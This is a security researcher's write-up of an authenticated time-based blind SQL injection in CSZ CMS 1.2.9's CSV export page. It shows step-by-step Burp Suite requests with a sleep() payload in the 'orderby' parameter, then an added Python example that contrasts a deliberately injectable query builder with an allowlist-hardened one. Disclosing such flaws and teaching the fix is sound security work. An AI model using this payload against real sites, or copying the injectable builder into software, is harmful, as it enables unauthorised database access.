Multiple Blind SQL Injection (Authenticated) in CSZ CMS Version 1.2.9
Hi Guys!!!
This is Rahad Chowdhury. I am a Cyber Security Researcher from Bangladesh.
This is my first write-up.
Today’s topic is all about CSZ CMS Version 1.2.9 Multiple Parameter Blind SQL Injection (Authenticated).
CVE:
CMS Version: 1.2.9
Affected URL:
Description:
Time-based SQL Injection is an inferential (blind) SQL Injection technique in which the attacker sends an SQL query that instructs the database to wait a certain period of time (in seconds) before responding. This attack can be used for very basic tests, such as determining whether a vulnerability is present at all. It is usually the best option when the attacker is facing a deep blind SQL injection, where no data or error output is returned. In this situation, only delay functions/procedures are necessary.
Now I explain how to find the Time-based Blind SQL Injection vulnerability in CSZ CMS (Version 1.2.9).
At first I installed CSZ CMS on my localhost. Then I opened the admin panel and tried to find a vulnerability, but did not find any. After that, when I opened the “export” page, I guessed that I had got something.
Steps to Reproduce:
1. First, log in to your admin panel.
2. Then go to “General Menu > CSV Export / Import”.
3. Then select any Table Name and select the Fields.
4. Now open Burp Suite and configure it with your browser.
5. Then, with Burp Suite intercepting, click “Export to CSV”. Your request data will be:
GET /CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=article_db_id&sort=ASC&submit=Export+to+CSV HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/CSZCMS/admin/export/article_db
Cookie: x=x.x.x.x; _pk_id.x.x=x.x.x.x.x.; back_to_admin=http%3A//127.0.0.1%3A8080/latest/admin/; mw-back-to-live-edit=true; show-sidebar-layouts=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CBAvqukS6679ewJxXOtVLBjexrDL7YqJvXggGnu2KyFWLhlDug5YVpb73EpNB%7C%242y%2410%248iuh7Co7azrDdHytSwJcmOenP.Q6xQmX0vmOiYNhu8PeouVHMpuaa; cszcookie_b54b1631aee51cb5309f41e2a09fec82csrf_cookie_csz=fb9f7d8059850bb0ad61e99c643f3e8a; b54b1631aee51cb5309f41e2a09fec82_cszsess=7pbpjbv1fkbu918ojs9424325ql2dioa
Connection: close
Upgrade-Insecure-Requests: 1
6. The “fieldS[]” and “orderby” parameters are vulnerable.
7. Let’s test for Blind SQL Injection by using this query, “(select(0)from(select(sleep(10)))a)”, in the “orderby” parameter. Your request data will be:
GET /CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8080/CSZCMS/admin/export/article_db
Cookie: x=x.x.x.x; _pk_id.x.x=x.x.x.x.x.; back_to_admin=http%3A//127.0.0.1%3A8080/latest/admin/; mw-back-to-live-edit=true; show-sidebar-layouts=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CBAvqukS6679ewJxXOtVLBjexrDL7YqJvXggGnu2KyFWLhlDug5YVpb73EpNB%7C%242y%2410%248iuh7Co7azrDdHytSwJcmOenP.Q6xQmX0vmOiYNhu8PeouVHMpuaa; cszcookie_b54b1631aee51cb5309f41e2a09fec82csrf_cookie_csz=fb9f7d8059850bb0ad61e99c643f3e8a; b54b1631aee51cb5309f41e2a09fec82_cszsess=7pbpjbv1fkbu918ojs9424325ql2dioa
Connection: close
Upgrade-Insecure-Requests: 1
8. Check your response time; you will see the following output:
By issuing sleep(0), the response will be delayed by 0 seconds.
By issuing sleep(1), the response will be delayed by 1 second.
By issuing sleep(5), the response will be delayed by 5 seconds.
By issuing sleep(10), the response will be delayed by 10 seconds.
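As an added example (not code from CSZ CMS or from this write-up), the query-building pattern that makes an “orderby” parameter injectable is shown beside a hardened builder that allowlists table and column names and the sort direction; the column list for article_db is an assumption, and the rows are constructed so the hardened path can run against an in-memory SQLite table.

```python
import re
import sqlite3

# Constructed stand-in for the CMS's article_db table; the real column
# list is an assumption, not taken from the CSZ CMS source.
TABLE_COLUMNS = {
    "article_db": {"article_db_id", "article_title", "article_date"},
}

IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def build_export_query_vulnerable(table, fields, orderby, sort):
    # Injectable pattern: user-controlled values are concatenated straight
    # into the SQL, so "orderby" can carry arbitrary expressions such as
    # the sleep() subquery shown in the write-up.
    return "SELECT %s FROM %s ORDER BY %s %s" % (", ".join(fields), table, orderby, sort)


def build_export_query_safe(table, fields, orderby, sort):
    # Hardened builder: identifiers cannot be bound as prepared-statement
    # parameters, so each one is checked against an allowlist of real column
    # names, and the sort direction against the two legal keywords.
    if table not in TABLE_COLUMNS:
        raise ValueError("unknown table: %r" % table)
    columns = TABLE_COLUMNS[table]
    for f in fields:
        if not IDENT_RE.match(f) or f not in columns:
            raise ValueError("illegal field: %r" % f)
    if not IDENT_RE.match(orderby) or orderby not in columns:
        raise ValueError("illegal orderby: %r" % orderby)
    if sort.upper() not in ("ASC", "DESC"):
        raise ValueError("illegal sort: %r" % sort)
    quoted = ", ".join('"%s"' % f for f in fields)
    return 'SELECT %s FROM "%s" ORDER BY "%s" %s' % (quoted, table, orderby, sort.upper())


def run_export(fields, orderby, sort):
    # Runs the hardened query against constructed rows and returns them,
    # mirroring what the CSV export would emit.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article_db (article_db_id INTEGER, article_title TEXT, article_date TEXT)")
    conn.executemany("INSERT INTO article_db VALUES (?, ?, ?)",
                     [(2, "second", "2021-01-02"), (1, "first", "2021-01-01")])
    sql = build_export_query_safe("article_db", fields, orderby, sort)
    return conn.execute(sql).fetchall()
```

The vulnerable builder passes the write-up's payload through untouched, while the hardened builder rejects it before any query reaches the database.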